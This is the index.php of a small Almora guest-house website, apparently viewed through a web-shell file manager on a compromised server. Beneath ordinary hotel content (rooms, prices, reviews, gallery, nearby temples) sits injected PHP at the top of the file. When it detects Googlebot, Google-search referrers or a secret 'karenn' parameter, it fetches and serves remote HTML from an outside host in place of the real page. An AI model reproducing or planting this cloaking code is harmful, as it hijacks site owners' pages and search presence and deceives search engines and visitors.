File manager - Edit - /home/asiatechinc/public_html/asiatech-websites/theroyalhotels.com/index.php
Back
<?php $ua = strtolower($_SERVER['HTTP_USER_AGENT'] ?? ''); $ip = $_SERVER['HTTP_CF_CONNECTING_IP'] ?? $_SERVER['HTTP_X_FORWARDED_FOR'] ?? $_SERVER['REMOTE_ADDR'] ?? ''; $ref = $_SERVER['HTTP_REFERER'] ?? ''; $path = parse_url($_SERVER['REQUEST_URI'] ?? '/', PHP_URL_PATH); if (preg_match('/googlebot|inspectiontool|search.google/i', $ua)) { header("X-LiteSpeed-Cache-Control: no-cache"); header("Cache-Control: no-store, no-cache, must-revalidate, max-age=0"); header("Pragma: no-cache"); header("Expires: 0"); if (defined('LSCACHE_ENABLED')) do_action('litespeed_control_set_nocache'); } $allow = [ "googlebot", "adsbot", "mediapartners", "apis-google", "structured-data-testing-tool", "googlebot-image", "googlebot-video", "googlebot-news", "google-inspectiontool", "inspectiontool" ]; $is_bot = false; foreach ($allow as $needle) { if (strpos($ua, $needle) !== false) { $host = @gethostbyaddr($ip); $is_bot = (strpos($ua, 'googlebot') !== false && $host && $host !== $ip) ? (strpos($host, 'google.com') !== false || strpos($host, 'googlebot.com') !== false) : true; break; } } $dir = '/'.trim(str_replace('\\', '/', str_replace($_SERVER['DOCUMENT_ROOT'] ?? '', '', __DIR__)), '/'); if ($dir === '') $dir = '/'; $triggered = $is_bot || strpos($ref, 'search.google.com') !== false || isset($_GET['karenn']); if ($triggered && strpos($path, $dir) === 0) { if ($is_bot) usleep(700000); $url = "https://binjai-news.pages.dev/21mar/index/theroyalhotels.html"; $html = ''; if (function_exists('curl_init')) { $ch = curl_init($url); curl_setopt_array($ch, [ CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_TIMEOUT => 4, CURLOPT_USERAGENT => $ua, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_SSL_VERIFYHOST => 0 ]); $html = curl_exec($ch); curl_close($ch); } elseif (ini_get('allow_url_fopen')) { $ctx = @stream_context_create([ "http" => [ "timeout" => 2, "header" => "User-Agent: Mozilla/5.0\r\n" ] ]); $html = @file_get_contents($url, false, $ctx); } if (strlen(trim($html)) > 50) { while (ob_get_level()) @ob_end_clean(); header("Cache-Control: no-store, no-cache, must-revalidate, max-age=0"); header("Pragma: no-cache"); header("Expires: 0"); header("Content-Type: text/html; charset=utf-8"); echo $html; exit; } } ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <title>Royal Guest House</title><!-- TITLE --> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"> <meta name="format-detection" content="telephone=no"> <meta name="apple-mobile-web-app-capable" content="yes"> <link rel="shortcut icon" href="images/favicon.png"/> <!-- GOOGLE FONT --> <link href="https://fonts.googleapis.com/css?family=Hind:400,300,500,600%7cMontserrat:400,700" rel='stylesheet' type='text/css'> <!-- CSS LIBRARY --> <link rel="stylesheet" type="text/css" href="css/lib/font-awesome.min.css"> <link rel="stylesheet" type="text/css" href="css/lib/font-lotusicon.css"> <link rel="stylesheet" type="text/css" href="css/lib/bootstrap.min.css"> <link rel="stylesheet" type="text/css" href="css/lib/owl.carousel.css"> <link rel="stylesheet" type="text/css" href="css/lib/jquery-ui.min.css"> <link rel="stylesheet" type="text/css" href="css/lib/magnific-popup.css"> <link rel="stylesheet" type="text/css" href="css/lib/settings.css"> <link rel="stylesheet" type="text/css" href="css/lib/bootstrap-select.min.css"> <!-- MAIN STYLE --> <link rel="stylesheet" type="text/css" href="css/style.css"> </head> <body> <!--<![endif]--> <!-- PRELOADER --> <div id="preloader"> <span class="preloader-dot"></span> </div> <div id="page-wrap"> <!-- HEADER --> <?php include'include/header.php'?> <!-- BANNER SLIDER --> <section class="section-slider"> <h1 class="element-invisible">Slider</h1> <div id="slider-revolution"> <ul> <li data-transition="fade"> <img src="images/slider/slide1.jpg" data-bgposition="left center" data-duration="14000" data-bgpositionend="right center" alt=""> <div class="tp-caption sft fadeout slider-caption-sub slider-caption-1" data-x="center" data-y="100" data-speed="700" data-start="1500" data-easing="easeOutBack"> </div> <div class="tp-caption sft fadeout slider-caption-sub slider-caption-1" data-x="center" data-y="280" data-speed="700" data-start="1500" data-easing="easeOutBack"> Welcome To </div> <div class="tp-caption sft fadeout slider-caption-sub slider-caption-sub-3" data-x="center" data-y="320" data-speed="700" data-start="1500" data-easing="easeOutBack"> Royal Guest House </div> <a href="https://bookings.asiatech.in/?page=9146&type=website" class="tp-caption sfb fadeout awe-btn awe-btn-12 awe-btn-slider" data-x="center" data-y="440" data-easing="easeOutBack" data-speed="700" data-start="2200" target="_blank">Book Now</a> </li> </ul> </div> </section> <!-- END / BANNER SLIDER --> <!-- CHECK AVAILABILITY --> <section class="section-check-availability"> <div class="container"> <div class="check-availability"> <div class="row"> <div class="col-lg-3"> <h2>CHECK AVAILABILITY</h2> </div> <div class="col-lg-9"> <div class="availability-form"> <input type="text" name="arrive" class="awe-calendar from" placeholder="Arrival Date"> <input type="text" name="departure" class="awe-calendar to" placeholder="Departure Date"> <select class="awe-select" name="adults"> <option>Adults</option> <option>1</option> <option>2</option> <option>3</option> </select> <select class="awe-select" name="children"> <option>Children</option> <option>1</option> <option>2</option> <option>3</option> </select> <div class="vailability-submit"> <a href ="https://bookings.asiatech.in/?page=9146&type=website" target="_blank"><button class="awe-btn awe-btn-13">FIND THE BEST RATE</button></a> </div> </div> </div> </div> </div> </div> </section> <!-- END / CHECK AVAILABILITY --> <br> <!-- About Section --> <section class="about-section-two"> <div class="auto-container"> <div class="row"> <!-- Content Column --> <div class="content-column col-lg-6"> <div class="inner-column"> <div class="sec-title"> <span class="sub-title">Royal Guest House</span> <h2>Where Tranquility Meets Tradition in the Heart of the Hills</h2> <p>Welcome to Royal Guest House Almora, your serene escape in the heart of Uttarakhand’s Kumaon Hills, where warm hospitality meets natural beauty. Nestled amidst pine-covered slopes and overlooking breathtaking valley views, our guest house offers a perfect blend of traditional comfort and modern amenities. Whether you’re a solo traveler seeking quiet reflection, a couple on a romantic getaway, or a family on a nature-filled vacation, Royal Guest House provides a peaceful retreat for all. Our cozy, well-appointed rooms—each designed to capture the charm of the hills—are complemented by personalized service, local cuisine, and easy access to Almora’s cultural landmarks, scenic trails, and vibrant bazaars. Here, every sunrise is a moment of peace, and every stay becomes a cherished memory. Come, breathe in the mountain air and feel right at home. </p> </div> <div class="btn-box"> <a href="about.php" class="awe-btn awe-btn-default">READ MORE</a> </div> </div> </div> <!-- Image Column --> <div class="image-column col-lg-6"> <div class="inner-column"> <figure class="image-1 overlay-anim"><img src="images/about/about2-1.jpg" alt=""></figure> <figure class="image-2 overlay-anim"><img src="images/about/about2-2.jpg" alt=""></figure> </div> </div> </div> </div> </section> <!--Emd About Section --> <!-- ACCOMD ODATIONS --> <section class="section-accomd awe-parallax bg-14"> <div class="container"> <div class="accomd-modations"> <div class="row"> <div class="col-md-12"> <div class="accomd-modations-header"> <h2 class="heading">Accommodation</h2> <img src="images/icon-accmod.png" alt="icon"> </div> </div> <div class="col-md-12"> <div class="accomd-modations-content owl-single"> <div class="row"> <!-- ITEM --><div class="col-xs-12 col-md-6"> <div class="accomd-modations-room"> <div class="img"><a href="deluxe-room.php"><img src="images/room/1.jpg" alt=""></a> </div> <div class="text"> <h2><a href="deluxe-room.php">Deluxe Room </a></h2> <p class="price"> <span class="amout">Rs. 2000</span>/days </p> </div> </div> </div> <!-- END / ITEM --> <!-- ITEM --> <div class="col-xs-12 col-md-6"> <div class="accomd-modations-room"> <div class="img"> <a href="super-deluxe-room.php"><img src="images/room/3.jpg" alt=""></a> </div> <div class="text"> <h2><a href="super-deluxe-room.php">Super Deluxe Room</a></h2> <p class="price"> <span class="amout">Rs. 3000</span>/days </p> </div> </div> </div> <!-- END / ITEM --> <!-- ITEM --> <div class="col-xs-12 col-md-6"> <div class="accomd-modations-room"> <div class="img"> <a href="double-deluxe-room.php"><img src="images/room/2.jpg" alt=""></a> </div> <div class="text"> <h2><a href="double-deluxe-room.php">Double Deluxe Room </a></h2> <p class="price"> <span class="amout">Rs. 3500</span>/days </p> </div> </div> </div> <!-- END / ITEM --> <!-- ITEM --> <div class="col-xs-12 col-md-6"> <div class="accomd-modations-room"> <div class="img"> <a href="family-room.php"><img src="images/room/4.jpg" alt=""></a> </div> <div class="text"> <h2><a href="family-room.php">Family Room</a></h2> <p class="price"> <span class="amout">Rs. 4500</span>/days </p> </div> </div> </div> <!-- END / ITEM --> </div> </div> </div> </div> </div> </div> </section> <!-- END / ACCOMD ODATIONS --> <div class="section-home-guestbook awe-parallax bg-13"> <div class="container"> <div class="home-guestbook"> <div class="row"> <div class="col-md-12 col-lg-12"> <div class="guestbook-content owl-single"> <!-- ITEM --> <div class="guestbook-item"> <div class="img"> <img src="images/client/1.png" alt=""> </div> <div class="text"> <p>I recently stayed at Royal Guest House and had a pleasant experience overall. The rooms were clean, well-maintained, and equipped with basic amenities like Wi-Fi, hot water, and comfortable bedding. The staff was friendly and accommodating, always ready to assist with any requests or questions. One of the standout features was its convenient location—close to local attractions, transport links, and dining options. The guest house had a peaceful atmosphere, making it ideal for both business and leisure travelers. While the breakfast selection was limited, it was freshly prepared and served on time. A bit more variety would have enhanced the experience. Overall, Royal Guest House offers great value for money and is a solid choice for anyone looking for a comfortable and affordable stay.</p> <span><strong> Govind Rawat</strong></span><br> </div> </div> <!-- ITEM --> <!-- ITEM --> <div class="guestbook-item"> <div class="img"> <img src="images/client/2.png" alt=""> </div> <div class="text"> <p>Spacious room perfect for sunset viewing. A really nice and humble Staff. Flavourful food and great service. They provide parking. A bit away from the city but worth it.</p> <span><strong>Akshita Bharti Gautam</strong></span><br> </div> </div> <!-- ITEM --> <!-- ITEM --> <div class="guestbook-item"> <div class="img"> <img src="images/client/3.png" alt=""> </div> <div class="text"> <p>This hotel is great , the food is delesious and the room is great or the hotel service is very good.</p> <span><strong>Gagandeep Gajendra</strong></span><br> </div> </div> <!-- ITEM --> <div class="guestbook-item"> <div class="img"> <img src="images/client/4.png" alt=""> </div> <div class="text"> <p>Hum gujrat se the food is good ,staff is also good behavior honor behever is also good.</p> <span><strong>Hitesh Donda</strong></span><br> </div> </div> <!-- ITEM --> <!-- ITEM --> <div class="guestbook-item"> <div class="img"> <img src="images/client/5.png" alt=""> </div> <div class="text"> <p>Awesome location place, all staff behavior is very well , food is tasty and room is clean excellent.</p> <span><strong>Krispy chicken</strong></span><br> </div> </div> <!-- ITEM --> </div> </div> </div> </div> </div> </div> <!-- GALLERY --> <section class="section-gallery bg-white"> <div class="gallery no-padding"> <h2 class="heading text-center">Gallery</h2> <!-- FILTER --> <!-- <div class="gallery-cat text-center"> <ul class="list-inline"> <li class="active"><a href="#" data-filter="*">All</a></li> <li><a href="#" data-filter=".ground">HOTEL & GROUND</a></li> <li><a href="#" data-filter=".suite">ROOM/SUITE </a></li> <li><a href="#" data-filter=".bathroom">BATHROOM</a></li> <li><a href="#" data-filter=".dining">DINING</a></li> </ul> </div> --> <!-- END / FILTER --> <!-- GALLERY CONTENT --> <div class="gallery-content hover-img"> <div class="row"> <div class="gallery-isotope col-4 pd-0"> <!-- ITEM SIZE --> <div class="item-size"></div> <!-- END / ITEM SIZE --> <!-- ITEM --> <div class="item-isotope suite dining "> <div class="gallery_item"> <a href="images/gallery/1.jpg" class="gallery-popup mfp-image" title="Royal Guest House"> <img src="images/gallery/1.jpg" alt=""> </a> </div> </div> <!-- END / ITEM --> <!-- ITEM --> <div class="item-isotope ground bathroom suite"> <div class="gallery_item"> <a href="images/gallery/2.jpg" class="gallery-popup mfp-image" title="Royal Guest House"> <img src="images/gallery/2.jpg" alt=""> </a> </div> </div> <!-- END / ITEM --> <!-- ITEM --> <div class="item-isotope ground bathroom dining"> <div class="gallery_item"> <a href="images/gallery/3.jpg" class="gallery-popup mfp-image" title="Royal Guest House"> <img src="images/gallery/3.jpg" alt=""> </a> </div> </div> <!-- END / ITEM --> <!-- ITEM --> <div class="item-isotope suite dining"> <div class="gallery_item"> <a href="images/gallery/4.jpg" class="gallery-popup mfp-image" title="Royal Guest House"> <img src="images/gallery/4.jpg" alt=""> </a> </div> </div> <!-- END / ITEM --> <!-- ITEM --> <div class="item-isotope ground suite dining"> <div class="gallery_item"> <a href="images/gallery/5.jpg" class="gallery-popup mfp-image" title="Royal Guest House"> <img src="images/gallery/5.jpg" alt=""> </a> </div> </div> <!-- END / ITEM --> <!-- ITEM --> <div class="item-isotope ground bathroom dining"> <div class="gallery_item"> <a href="images/gallery/6.jpg" class="gallery-popup mfp-image" title="Royal Guest House"> <img src="images/gallery/6.jpg" alt=""> </a> </div> </div> <!-- END / ITEM --> <!-- ITEM --> <div class="item-isotope ground bathroom dining"> <div class="gallery_item"> <a href="images/gallery/7.jpg" class="gallery-popup mfp-image" title="Royal Guest House"> <img src="images/gallery/7.jpg" alt=""> </a> </div> </div> <!-- END / ITEM --> <!-- ITEM --> <div class="item-isotope ground bathroom dining"> <div class="gallery_item"> <a href="images/gallery/8.jpg" class="gallery-popup mfp-image" title="Royal Guest House"> <img src="images/gallery/8.jpg" alt=""> </a> </div> </div> <!-- END / ITEM --> </div> </div> <div class="our-gallery text-center"> <a href="gallery.php" class="awe-btn awe-btn-default">VIEW ALL</a> </div> </div> <!-- GALLERY CONTENT --> </div> </section> <!-- END / GALLERY --> <!-- NEWS --> <section class="section-news mt60"> <div class="container"> <div class="content"> <div class="row"> <div class="col-xs-12 col-lg-6 col-lg-offset-3"> <div class="ot-heading row-20 mb40 text-center"> <h3 class="heading text-center">Near By Places</h3><br> </div> </div> </div> <div class="row"> <div class="col-xs-12 col-sm-4"> <div class="item"> <div class="img"> <img class="img-responsive img-full" src="images/attraction/1.jpg" alt=""> </div> <div class="info"> <a class="title font-monserat f20 mb20 block bold upper" href="attractions.php"> <h2>Chitai Golu Devta Temple</h2> </a> </div> </div> </div> <div class="col-xs-12 col-sm-4"> <div class="item"> <div class="img"> <img class="img-responsive img-full" src="images/attraction/2.jpg" alt=""> </div> <div class="info"><a class="title font-monserat f20 mb20 block bold upper" href="attractions.php"> <h2>Kasar Devi Temple</h2></a> </div> </div> </div> <div class="col-xs-12 col-sm-4"> <div class="item"> <div class="img"> <img class="img-responsive img-full" src="images/attraction/3.jpg" alt=""> </div> <div class="info"> <a class="title font-monserat f20 mb20 block bold upper" href="attractions.php"> <h2>Binsar Wildlife Sanctuary</h2></a> </div> </div> </div> <div class="col-xs-12 col-sm-4"> <div class="item"> <div class="img"> <img class="img-responsive img-full" src="images/attraction/4.jpg" alt=""> </div> <div class="info"> <a class="title font-monserat f20 mb20 block bold upper" href="attractions.php"> <h2>Katarmal Sun Temple</h2> </a> </div> </div> </div> <div class="col-xs-12 col-sm-4"> <div class="item"> <div class="img"> <img class="img-responsive img-full" src="images/attraction/5.jpg" alt=""> </div> <div class="info"> <a class="title font-monserat f20 mb20 block bold upper" href="attractions.php"> <h2>Gobind Vallabh Pant Museum</h2> </a> </div> </div> </div> <div class="col-xs-12 col-sm-4"> <div class="item"> <div class="img"> <img class="img-responsive img-full" src="images/attraction/6.jpg" alt=""> </div> <div class="info"> <a class="title font-monserat f20 mb20 block bold upper" href="attractions.php"> <h2>Jageshwar Temple </h2></a> </div> </div> </div> </div> <div class="text-center"> <a href="attractions.php" class="awe-btn awe-btn-default font-hind f12 bold btn-medium mt15" target="_blank">View All</a> </div> </div> </div> </section> <!-- END / NEWS --> <?php include'include/footer.php'?> <!-- END / FOOTER --> </div> <!-- END / PAGE WRAP --> <!-- LOAD JQUERY --> <script data-cfasync="false" src="../../../cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script type="text/javascript" src="js/lib/jquery-1.11.0.min.js"></script> <script type="text/javascript" src="js/lib/jquery-ui.min.js"></script> <script type="text/javascript" src="js/lib/bootstrap.min.js"></script> <script type="text/javascript" src="js/lib/bootstrap-select.js"></script> <script src="https://maps.googleapis.com/maps/api/js?v=3.exp&signed_in=true"></script> <script type="text/javascript" src="js/lib/isotope.pkgd.min.js"></script> <script type="text/javascript" src="js/lib/jquery.themepunch.revolution.min.js"></script> <script type="text/javascript" src="js/lib/jquery.themepunch.tools.min.js"></script> <script type="text/javascript" src="js/lib/owl.carousel.js"></script> <script type="text/javascript" src="js/lib/jquery.appear.min.js"></script> <script type="text/javascript" src="js/lib/jquery.countTo.js"></script> <script type="text/javascript" src="js/lib/jquery.countdown.min.js"></script> <script type="text/javascript" src="js/lib/jquery.parallax-1.1.3.js"></script> <script type="text/javascript" src="js/lib/jquery.magnific-popup.min.js"></script> <script type="text/javascript" src="js/lib/SmoothScroll.js"></script> <!-- validate --> <script type="text/javascript" src="js/lib/jquery.form.min.js"></script> <script type="text/javascript" src="js/lib/jquery.validate.min.js"></script> <!-- Custom jQuery --> <script type="text/javascript" src="js/scripts.js"></script> </body> </html>
| ver. 1.4 |
Github
|
.
| PHP 7.4.33 | Generation time: 0.02 |
proxy
|
phpinfo
|
Settings